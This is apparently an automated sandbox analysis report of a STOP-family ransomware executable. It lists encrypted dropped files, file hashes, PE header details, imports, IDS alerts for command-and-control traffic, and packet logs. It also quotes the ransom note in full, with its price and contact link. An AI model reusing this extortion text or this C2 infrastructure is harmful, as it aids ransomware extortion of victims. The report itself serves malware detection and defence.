                                                                                                SHA1:91ED92FF9AF673563761EA57C3788FBC62DCA83A
                                                                                                SHA-256:C6CC68081FCB39C083EC954F0684C20C0E4F4AEAD1AB1F0121936BBC39285FD2
                                                                                                SHA-512:C671A9D62EBD46612DD651EA5FB3E74133253ABFCDAAB26386C3B50C6D54A52B9F70D4B19A068A4D1C071821AC0EE9F991F67960A27AA33957BCE3E113EA5CDE
                                                                                                Malicious:false
                                                                                                Preview:[{000tB|....(.K6..M.._:x.w."......H..........x.,`..f.......V..m..c.h ..i.|...d~..u..Y...,x......g.......?..5%.n].^.f..~.NQ.}..c......o...'.L`%r....I^..QD..+..*.v....o.z.nrP...HZ5H...6D5.6j..J.|z4~...9.ao....3.n..Y..l.K...u.X.........}.f.?..a>...1....!...."e...#....G..-|..Z.Q...7.9o..'........w..q2....x....&.y,..W[M.6q..v..v.h.uz.._s/..{.9..h.F}|.%../y/./ph8JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Youtube.url

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):446
                                                                                                Entropy (8bit):7.3725283698548525
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8wcUpjByvIDVb75dgrfcR0a3EDStHXEytzIcii9a:uUpdyADVb75dkfw0a3EDKHXfzIbD
                                                                                                MD5:C91AB2AF0065547487A59FA390C5E138
                                                                                                SHA1:D40B85CD64BD2F017B2459E3B3E4EF971B43117C
                                                                                                SHA-256:72DEBBB3ADB0FBBD3A3E33A0E61947911D5186A18BD3C54EF767192FEB121842
                                                                                                SHA-512:9278258F203C7358C520A12356BD5A7029CE7D58E480E9A07BB7854199A1B5A44470D210F7C37359C5757AF0B3E7D71A5F05E1822DFE199C4B4034406AAA7BFB
                                                                                                Malicious:false
                                                                                                Preview:[{000P.M.......z.-.9..-@]s.....j7..L........`...................7.,..oT......WR@....}.9...Lz...I.....r..D<._aT..5.4.Go......./.7.<0._..~p.`9..k.v......;.{.|..VEnu.T ..pH...J.%h.D5.J...Zh.....aW.....~..!C?.+....%.}ex>.+/...../.....%.....0...z.......Tmx...x,.....G../.P`.........k.']......GE........z..d..t?.A.C.=.f:!2RW...@L....A.f}...Q...?/#.Jo.88JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Favorites\Youtube.url.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):446
                                                                                                Entropy (8bit):7.3725283698548525
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8wcUpjByvIDVb75dgrfcR0a3EDStHXEytzIcii9a:uUpdyADVb75dkfw0a3EDKHXfzIbD
                                                                                                MD5:C91AB2AF0065547487A59FA390C5E138
                                                                                                SHA1:D40B85CD64BD2F017B2459E3B3E4EF971B43117C
                                                                                                SHA-256:72DEBBB3ADB0FBBD3A3E33A0E61947911D5186A18BD3C54EF767192FEB121842
                                                                                                SHA-512:9278258F203C7358C520A12356BD5A7029CE7D58E480E9A07BB7854199A1B5A44470D210F7C37359C5757AF0B3E7D71A5F05E1822DFE199C4B4034406AAA7BFB
                                                                                                Malicious:false
                                                                                                Preview:[{000P.M.......z.-.9..-@]s.....j7..L........`...................7.,..oT......WR@....}.9...Lz...I.....r..D<._aT..5.4.Go......./.7.<0._..~p.`9..k.v......;.{.|..VEnu.T ..pH...J.%h.D5.J...Zh.....aW.....~..!C?.+....%.}ex>.+/...../.....%.....0...z.......Tmx...x,.....G../.P`.........k.']......GE........z..d..t?.A.C.=.f:!2RW...@L....A.f}...Q...?/#.Jo.88JH27WdrW6kuFkS6UwG9Yu6KR0DViv5JyVmKOoKE{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1193
                                                                                                Entropy (8bit):7.827466608163158
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:jWwQXQ1fzyOu+QHGMpghjPfIkSRBenTdRKTMe0OUDPRiXfzIbD:jWwQgFzyOu+gGMpgVoVR0dET30OUF0f2
                                                                                                MD5:C24508CB64CCC417094D8765C13F709E
                                                                                                SHA1:589DCA1959CA1966299BCB7A60E8C22F0339F060
                                                                                                SHA-256:E1D153029CB157DBB43DB8AEBE2AF932AD4D95FA29EB90C7C29B23C94551ACEA
                                                                                                SHA-512:64CE41BEBEBB2F394A838110E389F42DB84F8438B81E40464BDE9C2BDFCCB78D5A69F39AF0D4939A0BD9C4678B952A26D7598263F7520E8C5348D2CACE467B10
                                                                                                Malicious:false
                                                                                                Preview:<?xml......W.......U.....#:.O.....C....f.R=.B+.%.J..|.9.,......:.X...o l.IvQ.)..)..{0...{.L...z.V.).H.n.......K...R.....7....D.]R.e}...Y..H..)..G3..ALt<....7j....?..t.p...O{..vj.0...........,%&...bj...X.^V..x...'....V...9......|./C.e..\...L...t...w.f..B...X......?...<..Q`.S.S...*..d#F....8...k..2..P...p.._y...T..e.@...^yl..A..{.8(...u..WxG7.=..m........T....x...W..:Zw=Q./.U.k...*.9ZD.P...[....p..u.DR'P.E+.@.,.4g..IXv........3e+..w.cRTNV&-..%.E.N.Jx...Gx.8w.'.T...:._..@.9.g.^.....ZPvY....%{.H.y>T...NG.t.wEl.c..Y.S..@...P_..s....m.?.S(..G.{..\.[...J..............LP.:.SR.;m...A11r..1k..2w-S0......8}..aX...).aj.`..x.u.@_...F\v.#..x.;.n.o.....z..$.....B1c..d."...../6pY.z.D.......}/..p.9V....1.....0...0{....c..Xp.}8.p..........P0.<vT..-.......x^...Y..L.O..c.k.....+..:~E....;...T$...M;.C~.=....:..6......+8n...'"d..`....0..^..:....e..#\D.k+.|.e.!..H./....h..Li..rh@.L...".v.z.7..&..@....,....B b.E....{.......M..Oi.3.e..S...k....W.]6.).4O...y.

                                                                                                C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1193
                                                                                                Entropy (8bit):7.827466608163158
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:jWwQXQ1fzyOu+QHGMpghjPfIkSRBenTdRKTMe0OUDPRiXfzIbD:jWwQgFzyOu+gGMpgVoVR0dET30OUF0f2
                                                                                                MD5:C24508CB64CCC417094D8765C13F709E
                                                                                                SHA1:589DCA1959CA1966299BCB7A60E8C22F0339F060
                                                                                                SHA-256:E1D153029CB157DBB43DB8AEBE2AF932AD4D95FA29EB90C7C29B23C94551ACEA
                                                                                                SHA-512:64CE41BEBEBB2F394A838110E389F42DB84F8438B81E40464BDE9C2BDFCCB78D5A69F39AF0D4939A0BD9C4678B952A26D7598263F7520E8C5348D2CACE467B10
                                                                                                Malicious:false
                                                                                                Preview:<?xml......W.......U.....#:.O.....C....f.R=.B+.%.J..|.9.,......:.X...o l.IvQ.)..)..{0...{.L...z.V.).H.n.......K...R.....7....D.]R.e}...Y..H..)..G3..ALt<....7j....?..t.p...O{..vj.0...........,%&...bj...X.^V..x...'....V...9......|./C.e..\...L...t...w.f..B...X......?...<..Q`.S.S...*..d#F....8...k..2..P...p.._y...T..e.@...^yl..A..{.8(...u..WxG7.=..m........T....x...W..:Zw=Q./.U.k...*.9ZD.P...[....p..u.DR'P.E+.@.,.4g..IXv........3e+..w.cRTNV&-..%.E.N.Jx...Gx.8w.'.T...:._..@.9.g.^.....ZPvY....%{.H.y>T...NG.t.wEl.c..Y.S..@...P_..s....m.?.S(..G.{..\.[...J..............LP.:.SR.;m...A11r..1k..2w-S0......8}..aX...).aj.`..x.u.@_...F\v.#..x.;.n.o.....z..$.....B1c..d."...../6pY.z.D.......}/..p.9V....1.....0...0{....c..Xp.}8.p..........P0.<vT..-.......x^...Y..L.O..c.k.....+..:~E....;...T$...M;.C~.=....:..6......+8n...'"d..`....0..^..:....e..#\D.k+.|.e.!..H./....h..Li..rh@.L...".v.z.7..&..@....,....B b.E....{.......M..Oi.3.e..S...k....W.]6.).4O...y.

                                                                                                C:\Users\user\_README.txt

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1381
                                                                                                Entropy (8bit):4.894754314393066
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNzk5LmFRqrs6314kA+GT/kF5M2/kJw31:WZHfv0pfNAU5WEYNzoLPs41rDGT0f/kS
                                                                                                MD5:F15A25EF13B3CE75045B3DF6EA5E17D6
                                                                                                SHA1:0D0B0F5B56C116B60493629C439F6F6E3C71A034
                                                                                                SHA-256:E0354E011380D81532488C5F04748521FAB0A4E4F10979DE977694BE6864B35F
                                                                                                SHA-512:06BFEACEF2F073F9EDE529DDAF12F9C095BE9B4A4F053163493EFF7C1AE357C65732AA0ADD34AC6FA6E32E22D16FE0F317323B82D4A8E08199BEB741C0E60DE4
                                                                                                Malicious:true
                                                                                                Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.699125946845374
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:mU2p71KMss.exe
                                                                                                File size:781'824 bytes
                                                                                                MD5:e9ff14a975f084f01373d468c0b91a16
                                                                                                SHA1:302d4b9f88ae7b085b56661774d6805156039924
                                                                                                SHA256:f6a6765642f0f8c4b81f45d4e1a9f65505432bbf4c249fa3c96b82d9c712effe
                                                                                                SHA512:4c7965f1f1a123b57ab9ca49cd4b3db35c9d98086eec4cdd297b9b706d68dac25183d052934f564f935459c49471c953453202a99b8f0d62e03b0626d8c41ce0
                                                                                                SSDEEP:12288:M2dc5bz6tqdDlvGkNwikL95whi6SY7Mf6cMFqNjOjNiaUORnV77J1BDg:uWqdBpNwJLsi6v7iMpxDV77J3s
                                                                                                TLSH:2AF402027ED2C4A9D523DB72452099A0C67FFCF647258D27B34C13CE5E385E08A6E7A6
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......bD}.&%..&%..&%..+w..8%..+w..Y%..+w...%../]..!%..&%..K%......'%..+w..'%......'%..Rich&%..................PE..L....:.d...........

                                                                                                File Icon

                                                                                                Icon Hash:412955454145610d

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x40433f
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x64EC3A8A [Mon Aug 28 06:11:22 2023 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:5
                                                                                                OS Version Minor:1
                                                                                                File Version Major:5
                                                                                                File Version Minor:1
                                                                                                Subsystem Version Major:5
                                                                                                Subsystem Version Minor:1
                                                                                                Import Hash:da85065239035ee146657c2492fb98d0

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                call 00007FEB0CF7393Ch
                                                                                                jmp 00007FEB0CF6DE85h
                                                                                                push 00000014h
                                                                                                push 004199F8h
                                                                                                call 00007FEB0CF702F0h
                                                                                                call 00007FEB0CF73B0Dh
                                                                                                movzx esi, ax
                                                                                                push 00000002h
                                                                                                call 00007FEB0CF738CFh
                                                                                                pop ecx
                                                                                                mov eax, 00005A4Dh
                                                                                                cmp word ptr [00400000h], ax
                                                                                                je 00007FEB0CF6DE86h
                                                                                                xor ebx, ebx
                                                                                                jmp 00007FEB0CF6DEB5h
                                                                                                mov eax, dword ptr [0040003Ch]
                                                                                                cmp dword ptr [eax+00400000h], 00004550h
                                                                                                jne 00007FEB0CF6DE6Dh
                                                                                                mov ecx, 0000010Bh
                                                                                                cmp word ptr [eax+00400018h], cx
                                                                                                jne 00007FEB0CF6DE5Fh
                                                                                                xor ebx, ebx
                                                                                                cmp dword ptr [eax+00400074h], 0Eh
                                                                                                jbe 00007FEB0CF6DE8Bh
                                                                                                cmp dword ptr [eax+004000E8h], ebx
                                                                                                setne bl
                                                                                                mov dword ptr [ebp-1Ch], ebx
                                                                                                call 00007FEB0CF6F525h
                                                                                                test eax, eax
                                                                                                jne 00007FEB0CF6DE8Ah
                                                                                                push 0000001Ch
                                                                                                call 00007FEB0CF6DF61h
                                                                                                pop ecx
                                                                                                call 00007FEB0CF734CDh
                                                                                                test eax, eax
                                                                                                jne 00007FEB0CF6DE8Ah
                                                                                                push 00000010h
                                                                                                call 00007FEB0CF6DF50h
                                                                                                pop ecx
                                                                                                call 00007FEB0CF73948h
                                                                                                and dword ptr [ebp-04h], 00000000h
                                                                                                call 00007FEB0CF71331h
                                                                                                test eax, eax
                                                                                                jns 00007FEB0CF6DE8Ah
                                                                                                push 0000001Bh
                                                                                                call 00007FEB0CF6DF36h
                                                                                                pop ecx
                                                                                                call dword ptr [004120B8h]
                                                                                                mov dword ptr [040A0D24h], eax
                                                                                                call 00007FEB0CF73963h
                                                                                                mov dword ptr [004B326Ch], eax
                                                                                                call 00007FEB0CF73520h
                                                                                                test eax, eax
                                                                                                jns 00007FEB0CF6DE8Ah

                                                                                                Rich Headers

                                                                                                Programming Language:
                                                                                                • [ASM] VS2013 build 21005
                                                                                                • [ C ] VS2013 build 21005
                                                                                                • [C++] VS2013 build 21005
                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                • [RES] VS2013 build 21005
                                                                                                • [LNK] VS2013 UPD5 build 40629

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x19e040x50.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ca10000xd808.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x121f00x38.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x193200x40.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x120000x188.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x102550x1040036768b36f8382e675f946a442aca90a8False0.5994140625data6.713366444618865IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0x120000x86f00x8800aaf8ee4b39ba21ed0be8528d76840dd5False0.4509133731617647data5.094481379870692IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .data0x1b0000x3c85d280x984005c768537e640232cfbea54e5e98f6f3cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rsrc0x3ca10000xd8080xda0011e7ba23d48d0bc6146e0f4bfbabc9faFalse0.507758744266055data5.408116554677117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                AFX_DIALOG_LAYOUT0x3cade680xedata1.5714285714285714
                                                                                                AFX_DIALOG_LAYOUT0x3cade780xedata1.5714285714285714
                                                                                                RT_ICON0x3ca14d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.5652985074626866
                                                                                                RT_ICON0x3ca23780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.5482851985559567
                                                                                                RT_ICON0x3ca2c200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.6206647398843931
                                                                                                RT_ICON0x3ca31880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.4635892116182573
                                                                                                RT_ICON0x3ca57300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.4892120075046904
                                                                                                RT_ICON0x3ca67d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.4913934426229508
                                                                                                RT_ICON0x3ca71600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.449468085106383
                                                                                                RT_ICON0x3ca76300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0RomanianRomania0.4189765458422175
                                                                                                RT_ICON0x3ca84d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0RomanianRomania0.47653429602888087
                                                                                                RT_ICON0x3ca8d800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0RomanianRomania0.5766129032258065
                                                                                                RT_ICON0x3ca94480x568Device independent bitmap graphic, 16 x 32 x 8, image size 0RomanianRomania0.47760115606936415
                                                                                                RT_ICON0x3ca99b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0RomanianRomania0.46898340248962656
                                                                                                RT_ICON0x3cabf580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0RomanianRomania0.4842870544090056
                                                                                                RT_ICON0x3cad0000x988Device independent bitmap graphic, 24 x 48 x 32, image size 0RomanianRomania0.5024590163934426
                                                                                                RT_ICON0x3cad9880x468Device independent bitmap graphic, 16 x 32 x 32, image size 0RomanianRomania0.5593971631205674
                                                                                                RT_STRING0x3cae0700x3d2dataRomanianRomania0.46319018404907975
                                                                                                RT_STRING0x3cae4480x3bcdataRomanianRomania0.4592050209205021
                                                                                                RT_GROUP_ICON0x3ca75c80x68dataRomanianRomania0.6923076923076923
                                                                                                RT_GROUP_ICON0x3caddf00x76dataRomanianRomania0.6779661016949152
                                                                                                RT_VERSION0x3cade880x1e4data0.5392561983471075

                                                                                                Imports

                                                                                                DLLImport
                                                                                                KERNEL32.dllLocalCompact, GetComputerNameW, CreateHardLinkA, BackupSeek, GetTickCount, GetConsoleAliasesA, GetWindowsDirectoryA, EnumTimeFormatsA, GetUserDefaultLangID, SetCommState, LoadLibraryW, GetLocaleInfoW, ReadConsoleInputA, WriteConsoleW, GetModuleFileNameW, MultiByteToWideChar, GetTempPathW, InterlockedExchange, GetLastError, FindResourceExW, SetLastError, GetThreadLocale, GetProcAddress, SetFileAttributesA, BuildCommDCBW, LoadLibraryA, LocalAlloc, GetExitCodeThread, AddAtomW, RemoveDirectoryW, GlobalFindAtomW, GetOEMCP, GlobalUnWire, LoadLibraryExA, SetCalendarInfoA, GetConsoleProcessList, GetVolumeInformationW, ChangeTimerQueueTimer, GetSystemDefaultLangID, GetStringTypeW, HeapAlloc, EncodePointer, DecodePointer, IsProcessorFeaturePresent, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, HeapFree, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, GetStdHandle, WriteFile, GetProcessHeap, EnterCriticalSection, LeaveCriticalSection, FlushFileBuffers, GetConsoleCP, GetConsoleMode, DeleteCriticalSection, HeapSize, GetFileType, GetStartupInfoW, CloseHandle, GetCurrentThreadId, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, LoadLibraryExW, IsValidCodePage, GetACP, GetCPInfo, OutputDebugStringW, SetStdHandle, SetFilePointerEx, HeapReAlloc, LCMapStringW, CreateFileW
                                                                                                ADVAPI32.dllDeregisterEventSource
                                                                                                WINHTTP.dllWinHttpOpen

                                                                                                Possible Origin

                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                RomanianRomania

                                                                                                Network Behavior

                                                                                                Snort IDS Alerts

                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                04/24/24-15:57:00.032327TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4970780192.168.2.562.150.232.50
                                                                                                04/24/24-15:57:01.094676TCP2036335ET TROJAN Win32/Filecoder.STOP Variant Public Key Download804970762.150.232.50192.168.2.5

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Apr 24, 2024 15:56:52.526448011 CEST49704443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:52.526483059 CEST44349704104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:52.526581049 CEST49704443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:52.536397934 CEST49704443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:52.536406994 CEST44349704104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:52.878844976 CEST44349704104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:52.878937006 CEST49704443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:52.926485062 CEST49704443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:52.926513910 CEST44349704104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:52.926944017 CEST44349704104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:52.927012920 CEST49704443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:52.929429054 CEST49704443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:52.976125002 CEST44349704104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:53.660887957 CEST44349704104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:53.661005974 CEST44349704104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:53.661015987 CEST49704443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:53.661053896 CEST49704443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:53.675443888 CEST49704443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:53.675461054 CEST44349704104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:54.613445997 CEST49705443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:54.613542080 CEST44349705104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:54.613630056 CEST49705443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:54.626197100 CEST49705443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:54.626239061 CEST44349705104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:54.960839033 CEST44349705104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:54.960933924 CEST49705443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:54.964890003 CEST49705443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:54.964921951 CEST44349705104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:54.965332985 CEST44349705104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:54.969331026 CEST49705443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:54.981919050 CEST49705443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:55.024147034 CEST44349705104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:55.767724991 CEST44349705104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:55.767807961 CEST49705443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:55.767869949 CEST44349705104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:55.767903090 CEST44349705104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:55.767932892 CEST49705443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:55.767965078 CEST49705443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:55.768205881 CEST49705443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:55.768240929 CEST44349705104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:55.807178974 CEST49706443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:55.807223082 CEST44349706104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:55.807297945 CEST49706443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:55.857889891 CEST49706443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:55.857953072 CEST44349706104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:56.190655947 CEST44349706104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:56.190743923 CEST49706443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:56.195656061 CEST49706443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:56.195679903 CEST44349706104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:56.196032047 CEST44349706104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:56.196082115 CEST49706443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:56.197773933 CEST49706443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:56.240125895 CEST44349706104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:56.974494934 CEST44349706104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:56.974657059 CEST44349706104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:56.974736929 CEST49706443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:56.975006104 CEST49706443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:56:56.975025892 CEST44349706104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:56:59.640995979 CEST4970780192.168.2.562.150.232.50
                                                                                                Apr 24, 2024 15:57:00.031944036 CEST804970762.150.232.50192.168.2.5
                                                                                                Apr 24, 2024 15:57:00.032062054 CEST4970780192.168.2.562.150.232.50
                                                                                                Apr 24, 2024 15:57:00.032326937 CEST4970780192.168.2.562.150.232.50
                                                                                                Apr 24, 2024 15:57:00.509829998 CEST804970762.150.232.50192.168.2.5
                                                                                                Apr 24, 2024 15:57:01.090269089 CEST804970762.150.232.50192.168.2.5
                                                                                                Apr 24, 2024 15:57:01.090449095 CEST4970780192.168.2.562.150.232.50
                                                                                                Apr 24, 2024 15:57:01.094676018 CEST804970762.150.232.50192.168.2.5
                                                                                                Apr 24, 2024 15:57:01.094760895 CEST4970780192.168.2.562.150.232.50
                                                                                                Apr 24, 2024 15:57:01.094870090 CEST4970780192.168.2.562.150.232.50
                                                                                                Apr 24, 2024 15:57:01.488881111 CEST804970762.150.232.50192.168.2.5
                                                                                                Apr 24, 2024 15:57:08.910686970 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:08.910732031 CEST44349708104.21.65.24192.168.2.5
                                                                                                Apr 24, 2024 15:57:08.910813093 CEST49708443192.168.2.5104.21.65.24
                                                                                                Apr 24, 2024 15:57:08.918375015 CEST49708443192.168.2.5104.21.65.24
